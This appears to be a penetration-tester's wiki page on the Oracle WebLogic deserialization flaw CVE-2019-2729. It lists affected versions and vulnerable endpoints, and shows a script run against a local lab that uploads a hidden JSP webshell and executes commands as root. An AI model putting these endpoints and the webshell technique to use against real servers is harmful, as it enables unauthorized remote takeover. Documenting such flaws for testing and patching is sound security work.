WebLogic - CVE-2019-2729
Oracle WebLogic server is affected by a remote code execution vulnerability in wls-wsat.war and wls9_async_response.war packages due to unsafe deserialization of Java objects. A remote unauthenticated attacker can exploit the issue by sending a custom Java serialized object via HTTP request to execute arbitrary Java code in the context of the web server.
Exploiting wls-wsat.war will return command output, while wls9_async_response.war is blind.
Affected versions: 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0
Vulnerable endpoints
## wls-wsat.war (cmd response)
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11
## wls9_async_response.war (blind)
/_async/AsyncResponseServiceTest data
Request 01, RCE on version 10.3.6.0:
Request 02, designed for version 10.2.7.1, RCE on 10.3.6.0:
Request 03, designed for version 10.3.6.0, RCE on 10.3.6.0:
Request 04, designed for version 10.3.6.2, RCE on 10.3.6.0:
Request 05, designed for version 12.2.1.3, error "Old format work area header is disabled." on version 12.2.1.3. Not sure if this is an error caused by my container, need more test data.
Scripts
weblogic_get_webshell.py - runs three payloads on target at once, by rootedshell.
» python3 weblogic_get_webshell.py http://127.0.0.1:7003
--- payload2.txt (weblogic 10.3.6) ---
http://127.0.0.1:7003/wls-wsat/CoordinatorPortType
whoami :
root
--- payload.txt, uploading webshell '.s8Jn4WlqX2c592.jsp' ---
http://127.0.0.1:7003/_async/.s8Jn4gWlqX2c592.jsp?cmd=whoami
Cookie:JSESSIONID=DxZLnCLX1y5BPn1Yw9GrpYVFR0NQQhyrk1qFXsQ1Pz2qQbW1lyKR!903277329; path=/; HttpOnly
whoami:
rootAs there are few public exploits using the /_async/ endpoint, I've modified rootedshells script to only upload a webshell and allow direct command execution. The script can be found here.
Last updated
Was this helpful?